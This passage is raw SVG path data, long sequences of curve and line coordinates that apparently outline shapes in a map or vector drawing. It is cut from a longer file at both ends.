603.5,246.41619 C 605.15,246.04285 607.85,244.73498 609.5,243.5098 C 611.15,242.28462 615.65,239.3655 619.5,237.02286 C 623.35,234.68022 626.62309,232.65613 626.77354,232.52489 C 627.83176,231.60172 625.33659,229 623.39301,229 C 621.82357,229 621,228.42483 621,227.32874 C 621,226.40955 620.25526,224.83455 619.34501,223.82874 C 618.22486,222.59099 618.09198,222 618.93383,222 C 619.83324,222 620.05376,220.40788 619.73023,216.25 C 618.97194,206.50485 616.90322,200.82114 613.34259,198.70031 C 611.70138,197.72275 611.56694,194.31102 613.14884,193.78372 C 614.64704,193.28432 615.00666,187.13296 613.59155,186.21109 C 610.56635,184.24033 590.39556,186.03949 586.4371,188.63317 C 585.28389,189.38879 584.0602,189.72687 583.71779,189.38446 C 583.37539,189.04205 582.42835,189.4288 581.61325,190.24389 C 580.08417,191.77298 580.33558,197.63787 582.00455,199.37186 C 583.6078,201.03757 581.89767,203.01242 579.39574,202.38448 C 577.94738,202.02096 577,202.2215 577,202.89159 C 577,203.50122 576.325,204 575.5,204 C 574.675,204 573.98252,204.5625 573.96115,205.25 C 573.91747,206.65534 565.42269,211.04357 562.79705,211.01714 C 559.13571,210.98029 556,213.25885 556,215.95621 C 556,218.28879 558.00955,219.83915 573.5,229.45734 C 583.125,235.43362 591,240.72352 591,241.21268 C 591,241.70183 592.6145,242.77663 594.58777,243.60112 C 597.08864,244.64605 597.99938,245.55923 597.59406,246.61548 C 597.17636,247.70398 597.50371,247.98491 598.75629,247.61288 C 599.71533,247.32803 601.85,246.78952 603.5,246.41619 z M 672.12784,244 C 672.71912,244 673.03155,236.48953 672.93558,224.58326 C 672.84949,213.90405 673.04646,204.73384 673.3733,204.20501 C 673.70013,203.67618 672.56081,202.96216 670.84148,202.6183 C 669.12215,202.27443 667.17765,201.25763 666.52036,200.35874 C 665.54384,199.02326 664.60979,198.89447 661.41265,199.65444 C 658.00561,200.4643 657.49491,200.95432 657.46065,203.4464 C 657.43633,205.21464 656.61755,206.84198 655.31808,207.7048 C 653.46654,208.93417 652.81313,208.85635 649.85744,207.05438 C 648.01085,205.92858 645.27833,205.00579 643.78518,205.00374 C 642.12828,205.00146 640.66739,204.24703 640.03625,203.06772 C 638.78057,200.72148 635.74819,199.56547 630.75122,199.52806 C 628.40452,199.5105 627.00198,199.96751 627.00122,200.75 C 627.00055,201.4375 626.51786,202 625.92857,202 C 625.33929,202 624.18214,202.675 623.35714,203.5 C 622.53214,204.325 622.16939,205 622.55102,205 C 622.93265,205 622.68316,205.67685 621.99659,206.50411 C 620.65908,208.11571 620.34085,221.78232 621.54845,225.75 C 621.93642,227.02471 623.03438,228 624.08145,228 C 625.09795,228 626.4113,228.9 627,230 C 627.5887,231.1 628.61703,232.00277 629.28518,232.00616 C 629.95333,232.00955 631.75699,232.66797 633.29331,233.46933 C 635.75809,234.75497 636.47024,234.7434 639.34822,233.37099 C 642.58431,231.82781 642.71103,231.86646 655.55491,238.31462 C 662.67471,241.88905 669.0993,244.63053 669.83179,244.40679 C 670.56427,244.18306 671.59749,244 672.12784,244 z M 539.42717,236.56585 C 538.97365,234.75889 539.35524,233.7951 540.90812,232.82531 C 542.49875,231.83194 543,230.49826 543,227.25945 L 543,223 L 549,223 C 554.73333,223 555,222.88889 555,220.5 C 555,218.06163 554.82127,218.00043 547.75,218.01728 C 541.53072,218.0321 540.21272,218.35198 538.47931,220.26728 C 535.86093,223.1604 529,234.47557 529,235.90073 C 529,236.50533 528.55,237 528,237 C 527.45,237 527,237.45 527,238 C 527,238.5644 529.83968,239 533.51905,239 C 539.92633,239 540.02763,238.95827 539.42717,236.56585 z M 913.36763,230.78582 C 913.10051,230.35362 913.81025,230 914.94482,230 C 916.54471,230 917.27779,228.99007 918.21124,225.5 C 918.8732,223.025 919.7897,221 920.2479,221 C 920.7061,221 922.39509,220.02844 924.00123,218.84097 C 926.94547,216.6642 927.22326,214.59336 924.42708,215.66636 C 923.5972,215.98481 922.9899,215.85266 923.07753,215.37268 C 923.48255,213.15411 922.7818,212.5 920,212.5 C 918.35,212.5 917,212.8375 917,213.25 C 917,213.6625 916.55514,214 916.01143,214 C 915.46772,214 914.10313,214.7875 912.97901,215.75 C 911.85489,216.7125 910.61225,217.43047 910.21758,217.34549 C 909.82291,217.26051 909.1625,217.71051 908.75,218.34549 C 908.19763,219.19578 907.80237,219.20372 907.25,218.37563 C 906.8375,217.75723 905.06879,216.94085 903.31953,216.56145 C 900.74598,216.00327 899.9365,216.25014 899.07752,217.85515 C 897.71338,220.40406 898.8235,220.79237 905.1532,219.98035 C 907.81894,219.63836 910,219.72788 910,220.17928 C 910,220.63068 907.92686,221 905.39301,221 C 901.60288,221 900.89365,221.28047 901.39301,222.58179 C 901.72686,223.45177 902,224.57677 902,225.08179 C 902,225.5868 903.725,226 905.83333,226 C 910.41652,226 911.26032,226.64506 909.92963,229.13148 C 909.25243,230.39684 909.26379,231 909.96482,231 C 910.53417,231 910.94676,232.4625 910.88169,234.25 L 910.76337,237.5 L 910,234.5 C 909.58015,232.85 909.15176,232.175 909.04803,233 C 908.91337,234.071 908.61363,233.928 908,232.5 C 907.52731,231.4 907.10894,231.10557 907.07029,231.84571 C 907.03163,232.58585 907.7875,234.52938 908.75,236.16467 L 910.5,239.13793 L 912.17665,235.35478 C 913.0988,233.27405 913.63474,231.21802 913.36763,230.78582 z M 707.42765,235.16677 C 709.80209,233.89415 710.44735,232.98247 710.03175,231.48747 C 709.3217,228.93324 703.15541,216.96126 701.53971,215 C 699.74452,212.82086 698.95726,210.14445 699.93392,209.54084 C 700.39953,209.25308 701.52599,210.58867 702.43716,212.50882 C 704.01775,215.83966 706,217.19284 706,214.94098 C 706,214.35852 706.38674,214.12099 706.85943,214.41312 C 707.77728,214.98039 707.61115,211.50091 706.56264,208.19735 C 706.08624,206.69635 704.74817,206.04971 701.21365,205.61238 C 694.56316,204.7895 690.81249,204.91073 689.51129,205.99063 C 688.80584,206.5761 686.58857,206.37949 683.53588,205.46076 C 677.07536,203.51643 674.31729,203.59893 673.86663,205.75 C 673.66498,206.7125 673.63568,214.1427 673.80151,222.26155 L 674.10302,237.0231 L 689.18703,236.94085 C 701.33123,236.87464 704.88626,236.52888 707.42765,235.16677 z M 714.5,236 C 713.69473,234.69704 708,234.69704 708,236 C 708,236.55 709.60156,237 711.55902,237 C 713.67705,237 714.8678,236.59512 714.5,236 z M 902,235.42895 C 904.32735,234.95566 906,233.46394 906,231.86163 C 906,230.80321 906.675,229.67821 907.5,229.36163 C 910.21369,228.32029 909.06649,227 905.44798,227 C 902.42203,227 901.74521,226.56756 900.8781,224.08017 C 900.31828,222.47427 899.17,220.89548 898.32637,220.57175 C 897.4662,220.24167 897.04389,219.32801 897.36486,218.49157 C 897.67966,217.67121 897.5495,217 897.0756,217 C 894.86804,217 895.32129,220.06975 897.79954,221.90309 C 900.25742,223.72136 900.29788,223.84988 898.25,223.33378 C 895.66889,222.68329 895.15996,224.46367 897.6535,225.42053 C 899.14419,225.99256 899.11957,226.19689 897.4035,227.49571 C 896.13668,228.45451 895.95389,228.94703 896.85699,228.9682 C 897.63404,228.98641 897.97323,229.62737 897.65066,230.46797 C 897.34084,231.27536 897.51769,232.20192 898.04367,232.52699 C 898.56965,232.85207 899,234.01803 899,235.11803 C 899,236.47468 899.4021,236.86272 900.25,236.32433 C 900.9375,235.88779 901.725,235.48487 902,235.42895 z M 832.125,229 C 835.31583,229 835.76368,227.90654 833.5,225.64286 C 832.675,224.81786 832,223.47321 832,222.65476 C 832,221.83631 831.4375,220.95812 830.75,220.70323 C 828.86358,220.00384 832.34719,216.73913 835.31786,216.4224 C 837.34502,216.20627 843,211.85114 843,210.50607 C 843,210.2844 844.11657,208.89825 845.48126,207.42572 C 846.84596,205.95318 847.71744,204.35182 847.41788,203.86713 C 847.11833,203.38244 847.62956,202.69564 848.55396,202.34092 C 850.04743,201.76782 850.00612,201.57364 848.18308,200.59798 C 847.0547,199.99409 846.17794,199.275 846.23472,199 C 846.2915,198.725 845.82137,197.53475 845.18999,196.35501 C 843.55268,193.29565 845.49815,192.0423 851.2839,192.42909 C 856.74064,192.79389 857.32342,191.59192 853.45286,187.95571 C 851.30333,185.93634 850.01553,185.59676 845.20319,185.78041 C 842.0668,185.90009 839.34958,186.45127 839.16492,187.00524 C 838.98026,187.55921 838.34114,187.71084 837.74465,187.34219 C 837.03793,186.90541 836.9012,187.30016 837.35217,188.47536 C 838.10172,190.42866 836.07593,196 834.61613,196 C 833.48441,196 831.21622,198.81957 829.99056,201.75 C 829.3755,203.22056 828.19532,204 826.58377,204 C 825.22761,204 823.83538,204.45734 823.48992,205.01631 C 823.14446,205.57528 822.41933,205.75916 821.87853,205.42493 C 821.33773,205.0907 820.37093,206.20633 819.73009,207.90411 C 818.3915,211.45045 815.27828,212.41991 807.05732,211.85042 C 803.63796,211.61355 801.99896,211.88252 801.99938,212.68045 C 801.99972,213.3297 803.0125,214.0047 804.25,214.18045 C 805.69596,214.38581 806.61419,215.30404 806.81955,216.75 C 806.9953,217.9875 807.54368,219 808.03817,219 C 809.91383,219 807.74639,221.84684 805.42764,222.4288 C 804.09244,222.76392 803,223.69041 803,224.48767 C 803,225.28493 803.5625,225.7267 804.25,225.46939 C 804.9375,225.21208 808.65,224.8887 812.5,224.75078 C 818.06391,224.55145 819.85902,224.85902 821.25,226.25 C 822.2125,227.2125 823,228.50625 823,229.125 C 823,229.85167 824.10648,230.0287 826.125,229.625 C 827.84375,229.28125 830.54375,229 832.125,229 z M 802.30916,223.92579 C 802.60749,222.78497 803.71598,221.62553 804.77248,221.34925 C 807.25284,220.70062 806.55472,215.95782 803.87577,215.25726 C 802.86314,214.99245 801.43797,213.57975 800.70872,212.11793 C 799.54189,209.77896 799.60972,209.22248 801.27406,207.48003 C 803.13021,205.53676 803.12861,205.49432 801.18784,205.19423 C 798.47157,204.77423 797.40414,197.70569 799.33849,192.94779 C 800.81379,189.31899 800.57698,187 798.73112,187 C 798.1249,187 796.6999,186.17645 795.56445,185.16989 C 790.95388,181.08269 781.08014,180.41339 777.30331,183.93205 C 774.1122,186.90502 769.39367,187.21704 763.66622,184.83384 C 756.46834,181.83879 755.66321,180.62114 757.99903,176.263 C 759.75412,172.98838 759.77157,172.58101 758.25589,170.26778 C 756.76111,167.98647 756.52884,167.92387 755.38139,169.4931 C 754.69481,170.43205 753.67382,170.91645 753.11252,170.56954 C 752.55122,170.22264 750.99614,170.21385 749.65679,170.55 C 747.88847,170.99382 747.25973,171.79746 747.3608,173.48464 C 747.43736,174.76253 747.88781,175.56861 748.3618,175.27593 C 748.8358,174.98324 749.589,175.33499 750.03559,176.05758 C 750.69412,177.12311 751.13716,177.13106 752.37998,176.09961 C 753.22281,175.40012 754.3821,175.11812 754.9562,175.47293 C 756.34394,176.3306 756.29612,179 754.89301,179 C 754.28417,179 754.04504,178.325 754.36163,177.5 C 755.08279,175.62068 754.07041,175.63217 751.55887,177.5318 C 749.34417,179.20692 747.58389,179.4823 748.49292,178.01145 C 748.84433,177.44286 748.43917,177.27798 747.5392,177.62333 C 746.67863,177.95356 745.32497,177.68467 744.53107,177.02579 C 742.31709,175.18835 740.76346,176.6895 742.16628,179.31069 C 742.8107,180.51481 743.23788,181.5 743.11555,181.5 C 742.99322,181.5 743.57434,183.13035 744.40693,185.123 C 745.31294,187.2914 746.83998,189.00434 748.21036,189.38944 C 750.22499,189.95558 750.31239,190.18104 748.93803,191.26643 C 746.16745,193.45449 746.07857,195.51823 748.66697,197.56031 C 752.02622,200.21054 754.47489,202.8705 754.625,204.03242 C 754.69375,204.56459 754.80625,205.68357 754.875,206.51905 C 754.96606,207.62567 755.67876,207.86774 757.5,207.41064 C 759.00758,207.03226 760,207.21073 760,207.86021 C 760,208.45257 760.56563,208.72018 761.25696,208.45489 C 762.4307,208.00448 764.02387,210.14359 765.57306,214.25 C 765.93617,215.2125 766.89881,216 767.71226,216 C 768.52571,216 770.38573,216.82677 771.84563,217.83727 C 776.08481,220.7715 777.92952,221.08781 781.13518,219.4301 C 784.32121,217.78254 787,218.75695 787,221.56343 C 787,223.39912 787.74047,223.70936 794,224.49622 C 797.025,224.87648 799.6875,225.37039 799.91667,225.5938 C 800.86925,226.52245 801.79976,225.87371 802.30916,223.92579 z M 555,215.02568 C 555,212.83967 559.56676,210 563.08231,210 C 565.52258,210 572,206.32763 572,204.94412 C 572,203.5974 577.98269,200.77938 579.55823,201.38397 C 580.31598,201.67475 581.17816,201.52074 581.47421,201.04174 C 581.77025,200.56273 581.58344,200.01989 581.05909,199.83541 C 580.53473,199.65093 579.8331,197.93867 579.4999,196.03038 C 578.73843,191.66927 578.73523,191.66652 574.15842,191.44456 C 572.06625,191.34309 569.33618,190.7151 568.09159,190.04902 C 565.50157,188.66288 565.74129,188.5045 564.06927,192.70655 C 563.16822,194.971 561.77267,196.24995 559.31928,197.05964 C 555.02694,198.47624 551.73989,203.37959 552.5493,207.15854 C 552.99748,209.25095 552.56374,210.2092 550.51248,211.65854 C 542.88446,217.04815 542.91255,216.93006 549.25,216.96673 C 554.31964,216.99606 555,216.76639 555,215.02568 z M 754.76554,212.61932 C 753.81159,211.89493 753.32409,211.00924 753.68221,210.65112 C 754.04033,210.29301 753.58333,210 752.66667,210 C 751.75,210 751,210.6375 751,211.41667 C 751,212.90113 752.46988,213.80973 755,213.88925 C 756.20564,213.92714 756.15963,213.67793 754.76554,212.61932 z M 715.55213,209.83674 L 719.21858,207.67348 L 716.90691,205.92978 L 714.59523,204.18608 L 718.63095,203.09937 C 721.07818,202.4404 722.66667,201.41977 722.66667,200.50633 C 722.66667,198.59976 721.65612,198.60935 717.90036,200.55153 C 716.25019,201.40486 714.09908,201.84883 713.12012,201.53813 C 711.69114,201.08458 711.13959,201.81378 710.32269,205.2366 C 709.76306,207.58147 709.39911,208.4875 709.51392,207.25 C 709.63765,205.91631 709.16826,205 708.36133,205 C 706.35905,205 706.70451,207.70451 709,210 C 711.45062,212.45062 711.10745,212.45917 715.55213,209.83674 z M 816.5231,210.23469 C 817.0858,209.83061 818.34307,208.24816 819.31703,206.71813 C 820.29099,205.18811 821.487,204.18295 821.97483,204.48445 C 822.46267,204.78594 823.14446,204.57528 823.48992,204.01631 C 823.83538,203.45734 825.21648,203 826.55902,203 C 828.3459,203 829,202.45566 829,200.96862 C 829,199.85135 829.64659,198.68911 830.43686,198.38586 C 831.22713,198.0826 831.62898,197.19672 831.32987,196.41724 C 830.97586,195.4947 831.4625,195 832.72403,195 C 835.28383,195 837.99185,190.23103 836.09702,189.05996 C 835.37622,188.61448 835.18832,188.00165 835.67946,187.69811 C 836.43995,187.22809 836.55688,184.94419 836.04797,180.5 C 835.98499,179.95 835.15196,180.43451 834.19678,181.57668 C 833.24161,182.71886 831.90658,183.46886 831.23005,183.24335 C 830.55352,183.01784 830,183.39583 830,184.08333 C 830,184.77083 829.71583,185.04917 829.36852,184.70185 C 829.0212,184.35453 827.8962,184.52037 826.86852,185.07037 C 825.59405,185.75244 824.34035,185.71733 822.92514,184.95993 C 820.41907,183.61873 813,184.66437 813,186.35878 C 813,187.00943 810.98347,188.64335 808.51883,189.98971 C 804.99501,191.91468 803.77727,192.17727 802.81883,191.21883 C 801.86039,190.26039 802.17683,190 804.3,190 C 805.785,190 807,189.55 807,189 C 807,188.45 807.88417,188 808.96482,188 C 810.04547,188 811.39172,187.13658 811.9565,186.08128 C 812.52128,185.02599 814.33711,183.86523 815.99168,183.50183 C 819.02656,182.83526 820.20071,181 817.59229,181 C 814.76803,181 805.65974,175.48882 804.01547,172.78504 C 803.08634,171.25722 802.04872,170.28461 801.70965,170.62369 C 800.6467,171.68663 796,170.02987 796,168.58794 C 796,166.94692 793.92403,166.01153 791.35763,166.49618 C 790.33593,166.68912 788.9375,166.88141 788.25,166.92349 C 787.5625,166.96557 787,167.88875 787,168.975 C 787,170.66213 786.52629,170.86076 783.75,170.33774 C 781.9625,170.00099 779.78957,169.11224 778.92126,168.36274 C 777.12313,166.81063 772.40571,166.53454 771.54271,167.9309 C 771.22627,168.4429 771.43206,169.14899 772,169.5 C 772.56794,169.85101 772.77104,170.56145 772.45133,171.07875 C 772.13161,171.59606 772.79927,173.20065 773.93502,174.64451 C 775.07076,176.08838 776,178.55903 776,180.13486 C 776,182.88174 777.2935,183.95217 778.4167,182.13478 C 780.18159,179.27914 791.84089,180.70683 796.02712,184.29119 C 797.12478,185.23104 798.69272,186 799.51143,186 C 801.49425,186 801.85788,192.17142 800.01226,194.5 C 799.57633,195.05 799.33781,196.625 799.48221,198 C 799.62661,199.375 799.80218,201.23502 799.87238,202.13337 C 799.94257,203.03172 800.93242,204.01057 802.07205,204.30859 C 804.03745,204.82255 804.06063,204.97783 802.52247,207.32536 C 801.24354,209.27726 801.17548,209.91036 802.20042,210.32119 C 804.21062,211.12694 815.37447,211.05952 816.5231,210.23469 z M 654.93384,207.03541 C 656.13456,206.3928 656.58648,205.28763 656.28768,203.72459 C 655.74182,200.86908 657.37114,199.38987 662.0187,198.52159 C 664.7338,198.01434 666.05689,198.31475 667.81205,199.837 C 669.08508,200.94109 672.93949,202.30658 676.56529,202.93799 C 680.12851,203.55849 684.21374,204.51096 685.64357,205.05459 C 687.47605,205.75129 688.66198,205.6955 689.66203,204.86553 C 691.31008,203.49777 698.0346,202.84478 699.5,203.91021 C 700.05,204.31009 701.74034,204.71408 703.25631,204.80795 C 705.72116,204.96059 706.33884,204.28817 709.09778,198.44888 C 710.79462,194.85751 711.9359,191.27534 711.63396,190.4885 C 711.33202,189.70166 711.66998,188.47288 712.38498,187.75788 C 713.45165,186.69121 712.9953,186.43979 709.84249,186.35712 C 707.72912,186.30171 706,186.61739 706,187.05863 C 706,188.53144 701.53548,188.62013 698.61382,187.20538 C 696.37124,186.11945 695.24773,186.06464 693.57546,186.95961 C 692.092,187.75354 690.62339,187.80731 688.84896,187.13268 C 686.84771,186.3718 685.88348,186.52635 684.51743,187.82696 C 683.14915,189.12969 682.85783,189.17607 683.20127,188.03651 C 683.44385,187.23159 682.60512,185.61177 681.33743,184.43691 C 680.06973,183.26205 679.32521,182.00812 679.68293,181.6504 C 680.04065,181.29268 679.38903,181 678.23489,181 C 676.05827,181 675.79127,178.74036 677.49131,174.70687 C 678.44118,172.45322 677.94309,171.96353 674.36564,171.63394 C 672.78954,171.48873 671.575,170.94919 671.66667,170.43496 C 671.75833,169.92073 670.52083,169.5 668.91667,169.5 C 665.69656,169.5 665.28334,170.16034 667.40275,171.91929 C 668.47992,172.81326 668.92646,172.78365 669.32662,171.79174 C 669.73636,170.77609 670.06364,170.81039 670.85789,171.95225 C 672.32859,174.06664 671.19884,175.17678 668.85367,173.92168 C 665.31259,172.02656 665.68519,173.72945 669.65648,177.59088 C 672.54324,180.39777 673.12661,181.45318 672,181.83069 C 671.175,182.10715 670.48894,182.14583 670.47542,181.91667 C 670.4619,181.6875 669.73078,182.17263 668.85072,182.99474 C 667.97065,183.81684 667.46736,185.05434 667.73229,185.74474 C 668.00041,186.44345 667.47233,187 666.54125,187 C 664.18869,187 660.84171,185.06513 661.46098,184.06313 C 661.74533,183.60305 661.22155,182.61313 660.29703,181.86331 C 658.85065,180.69024 658.73943,180.70932 659.5,182 C 660.25224,183.27654 660.14072,183.30289 658.7514,182.17689 C 657.85351,181.44917 657.34489,180.26481 657.62112,179.54496 C 657.89735,178.82512 657.00265,177.02688 655.63289,175.54889 C 654.0964,173.89099 653.2109,171.83724 653.32121,170.18734 C 653.46465,168.04186 652.80793,167.17626 650,165.80977 C 648.075,164.87295 646.05,163.74502 645.5,163.30324 C 644.95,162.86146 643.2625,161.86146 641.75,161.08102 C 640.2375,160.30058 638.99311,159.40058 638.98469,159.08102 C 638.97627,158.76146 638.56056,157.85394 638.0609,157.0643 C 637.31111,155.87938 636.87918,155.85538 635.58805,156.92693 C 634.28529,158.00812 633.92017,157.95555 633.40484,156.61262 C 632.52671,154.32424 630.45482,154.61218 630.27133,157.0481 C 630.17426,158.33676 631.01524,159.50545 632.5393,160.19986 C 633.87154,160.80687 635.20386,162.06693 635.5,163 C 636.07832,164.82213 640.0186,166.99033 642.79705,167.01531 C 644.19377,167.02787 644.24433,167.19245 643.0782,167.93051 C 642.02529,168.59692 642.70855,169.1137 645.71171,169.92237 C 650.10525,171.10543 652.80078,173.38705 651.06923,174.45722 C 650.50388,174.80662 649.09349,174.58522 647.93502,173.96522 C 645.38855,172.60239 644.26065,173.40422 645.91692,175.39989 C 646.87969,176.55996 646.67319,177.36065 644.87908,179.42406 C 643.64722,180.84083 641.99734,182 641.21268,182 C 640.33977,182 640.01508,182.59691 640.37615,183.53785 C 640.7019,184.38674 640.34559,185.31389 639.58084,185.60735 C 637.80045,186.29055 628.75654,182.20295 629.47532,181.03993 C 629.77415,180.55642 632.9295,180.20959 636.48721,180.26919 C 640.04493,180.32879 643.30323,179.99545 643.72789,179.52845 C 644.15255,179.06144 643.96859,178.98384 643.3191,179.35599 C 642.6696,179.72814 641.85554,179.57528 641.51008,179.01631 C 641.16462,178.45734 641.37436,178 641.97617,178 C 642.76049,178 642.76724,177.4336 642,176 C 641.4113,174.9 640.27047,174 639.46482,174 C 638.65917,174 638,173.52344 638,172.94098 C 638,172.35852 637.60099,172.12857 637.11331,172.42997 C 636.62563,172.73138 635.67053,172.30793 634.99086,171.48899 C 634.3112,170.67005 632.97996,170 632.03254,170 C 631.08513,170 629.50588,169.11149 628.5231,168.02553 C 627.54032,166.93957 625.94032,165.79844 624.96753,165.48969 C 623.99474,165.18094 622.92224,163.82631 622.58418,162.47939 C 621.6808,158.88002 618.31512,158.52835 612.35939,161.41104 C 607.95944,163.5407 606.6889,163.75289 603.54118,162.88376 C 599.31583,161.71708 596.91333,162.95256 597.68311,165.89623 C 598.04183,167.26797 597.21223,168.1018 594.32988,169.26649 C 592.22345,170.11766 589.22164,172.16067 587.6592,173.80653 C 584.99305,176.61502 584.93157,176.86478 586.6592,177.86909 C 588.28158,178.81221 588.30035,178.94279 586.81739,178.96959 C 585.89195,178.98632 584.84913,179.9 584.5,181 C 584.15087,182.1 583.27565,183 582.55506,183 C 581.83446,183 580.68469,183.675 580,184.5 C 579.26628,185.38408 577.06028,186.00629 574.62756,186.01531 C 565.90517,186.04767 565.93203,190.02402 574.65754,190.45337 C 577.3209,190.58442 580.175,190.14949 581,189.48685 C 581.825,188.82421 583.625,187.96321 585,187.57352 C 586.375,187.18382 589.075,186.42757 591,185.89295 C 594.0297,185.05153 609.51612,183.91296 621.21414,183.67158 C 625.69753,183.57907 627.12459,184.70451 624.73734,186.45011 C 623.16096,187.60279 623.13857,187.87011 624.52222,189.01844 C 625.89678,190.15922 625.82384,190.55862 623.859,192.65009 L 621.65137,195 L 623.8847,195 C 625.11304,195 625.88183,195.38218 625.59315,195.84929 C 624.80231,197.12888 629.61834,199.36043 631.56149,198.61478 C 633.96032,197.69426 639.88182,200.05227 640.56329,202.19941 C 640.92592,203.34194 642.11518,204.00192 643.81739,204.00526 C 645.29282,204.00816 647.85,204.87527 649.5,205.93217 C 653.16662,208.2808 652.76077,208.1984 654.93384,207.03541 z M 700.00836,193.03114 C 697.89526,191.68838 699.68426,190.37032 704.5,189.72186 C 706.7,189.42562 707.9375,189.40451 707.25,189.67495 C 706.5625,189.9454 706,190.80417 706,191.58333 C 706,192.3625 705.5868,193 705.08179,193 C 704.57677,193 703.56427,193.22027 702.83179,193.4895 C 702.0993,193.75872 700.82876,193.55246 700.00836,193.03114 z M 670.01008,191.10761 C 668.64063,190.72645 667.96614,190.13896 668.51122,189.80208 C 669.91791,188.9327 679,190.08257 679,191.13005 C 679,192.13558 673.65546,192.12224 670.01008,191.10761 z M 590,178 C 590,177.45 590.45,177 591,177 C 591.55,177 592,177.45 592,178 C 592,178.55 591.55,179 591,179 C 590.45,179 590,178.55 590,178 z M 615.70044,178.26631 C 615.45967,177.84484 614.95946,175.81929 614.58886,173.76508 C 614.0445,170.74777 614.19196,170.13643 615.35637,170.58326 C 617.053,171.23432 618.50003,169.42707 617.01631,168.51008 C 615.30824,167.45444 615.88112,165.13399 618.14954,163.91997 C 620.20222,162.82141 620.27264,162.93247 619.71241,166.38479 C 619.36684,168.5143 619.53567,170 620.12324,170 C 620.67186,170 620.98107,171.6875 620.81037,173.75 C 620.63966,175.8125 620.05,177.50689 619.5,177.51531 C 618.95,177.52373 617.96859,177.86858 617.3191,178.28162 C 616.6696,178.69467 615.9412,178.68778 615.70044,178.26631 z M 619.77383,173.75005 C 619.68267,170.54388 618.52909,169.35812 617.32575,171.23369 C 615.85356,173.5283 616.31411,176.57143 618.13356,176.57143 C 619.3733,176.57143 619.83163,175.78306 619.77383,173.75005 z M 618.60417,165.27083 C 617.58765,164.25432 616.74892,165.78472 617.58295,167.13421 C 618.21298,168.15363 618.44853,168.15442 618.78725,167.13825 C 619.01885,166.44346 618.93646,165.60313 618.60417,165.27083 z M 594.54271,176.0691 C 593.76987,174.81862 595.7452,173.68824 597.51586,174.36771 C 598.29691,174.66743 599.20646,174.47497 599.53707,173.94001 C 599.86769,173.40506 600.614,173.26144 601.19553,173.62085 C 601.77707,173.98026 600.79431,174.8876 599.01163,175.63716 C 595.15968,177.25678 595.27014,177.24611 594.54271,176.0691 z M 621.26917,205.1825 C 621.14221,204.59538 622.20576,203.19671 623.63262,202.07434 C 626.31918,199.9611 626.30873,197 623.61472,197 C 621.45553,197 621.04769,194.74454 622.8361,192.69406 C 624.10041,191.24448 624.17663,190.51247 623.22233,188.9844 C 622.24747,187.4234 622.34548,186.88293 623.76672,185.98229 C 624.92955,185.24541 625.00633,185.02311 624,185.30683 C 623.175,185.53943 621.63015,185.28065 620.567,184.73175 C 618.02403,183.41883 614.74905,187.15197 615.57097,190.42674 C 615.91372,191.79238 615.52584,193.14862 614.56429,193.94665 C 612.45187,195.69979 612.57722,196.44077 615.52413,199.62054 C 616.91241,201.11851 618.31611,203.4113 618.64347,204.71562 C 619.20918,206.96957 621.75342,207.42198 621.26917,205.1825 z M 710.90262,199.56929 C 710.63954,199.30621 709.82854,200.08299 709.10039,201.29548 C 707.83547,203.40179 707.85678,203.4231 709.57872,201.77381 C 710.56995,200.8244 711.1657,199.83237 710.90262,199.56929 z M 1047.703,201.10392 C 1048.6777,199.54325 1048.5433,198.8967 1046.9436,197.44893 C 1045.8746,196.48153 1044.9507,195.87227 1044.8904,196.09501 C 1044.8301,196.31776 1044.6577,197.9625 1044.5074,199.75 C 1044.2013,203.38938 1045.8417,204.08439 1047.703,201.10392 z M 722.62689,196.92995 C 729.32072,193.23488 730.64341,191.76517 730.08333,188.64474 C 729.99891,188.17435 730.50812,187.08595 731.21491,186.22609 C 732.35327,184.8412 732.10037,184.75014 729,185.42855 C 727.075,185.84978 723.25,186.26317 720.5,186.34721 C 715.37714,186.50375 713.09265,187.97801 713.0318,191.16667 C 713.01431,192.08333 713.51453,193.00484 714.1434,193.21447 C 714.98791,193.49597 714.96673,194.19365 714.06238,195.88345 C 713.38895,197.14176 712.58529,197.91863 712.27648,197.60981 C 711.96766,197.301 712.28422,196.36246 712.97994,195.52417 C 713.67566,194.68587 713.9019,194 713.48269,194 C 713.06348,194 712.17434,194.7469 711.50683,195.65977 C 710.53309,196.99145 710.60464,197.68331 711.86883,199.15977 C 712.73544,200.1719 713.85157,201 714.34913,201 C 714.84669,201 718.57168,199.16848 722.62689,196.92995 z M 1054,197.10699 C 1054,196.61583 1053.3479,195.96375 1052.5509,195.65792 C 1051.5824,195.28626 1051.2863,195.58241 1051.6579,196.55093 C 1052.2649,198.13266 1054,198.54461 1054,197.10699 z M 1068.1606,191.55098 C 1071.388,192.57531 1078.5692,188.97954 1079.7981,185.7239 C 1080.3939,184.14558 1080.6671,182.29614 1080.4054,181.61402 C 1080.1436,180.9319 1080.8453,179.54496 1081.9647,178.53192 C 1084.2642,176.45092 1084.6113,173.70153 1082.75,172.31109 C 1080.3416,170.51194 1078.5071,171.42773 1078.1991,174.58286 C 1077.7441,179.24485 1071.6163,185.24657 1067.1058,185.44794 C 1066.339,185.48217 1065.214,186.40789 1064.6058,187.50509 C 1063.9976,188.60229 1063.3988,189.67622 1063.2751,189.8916 C 1063.1514,190.10698 1060.6764,190.35093 1057.7751,190.43373 C 1052.0978,190.59574 1047.539,192.44506 1048.597,194.15694 C 1049.0324,194.86146 1049.5162,194.78286 1050.0488,193.92106 C 1050.6933,192.87819 1051.189,192.90585 1052.6157,194.0643 C 1053.5882,194.85394 1054.0798,194.99229 1053.7082,194.37175 C 1053.287,193.66851 1054.2035,193.0093 1056.1412,192.62175 C 1061.1155,191.62689 1062.2781,191.83301 1061.6037,193.59024 C 1060.38,196.77914 1062.31,197.13807 1064.2453,194.08151 C 1065.7214,191.7502 1066.7315,191.09738 1068.1606,191.55098 z M 1058.3705,194.47686 C 1058.8474,193.2342 1058.5908,193.14861 1056.9775,194.01204 C 1054.6594,195.25264 1054.4397,196 1056.393,196 C 1057.1592,196 1058.049,195.31459 1058.3705,194.47686 z M 865.97686,190.47212 C 865.3049,189.66245 863.95836,189 862.98454,189 C 860.2824,189 859.84587,191.65372 862.28194,193.27121 C 864.11593,194.48893 864.64602,194.49683 865.81893,193.32392 C 866.91367,192.22918 866.94629,191.64021 865.97686,190.47212 z M 1038.25,190.75497 C 1039.6157,190.84919 1040,190.08317 1040,187.26659 C 1040,182.73373 1037.7865,180.127 1034.4749,180.76006 C 1032.8143,181.0775 1031.9632,181.93508 1031.8882,183.36658 C 1031.8267,184.53996 1031.6066,186.96985 1031.399,188.76634 C 1031.0386,191.8854 1031.1451,192.00115 1033.7608,191.33346 C 1035.2674,190.94889 1037.2875,190.68857 1038.25,190.75497 z M 574.47251,184.96404 C 578.96692,184.9239 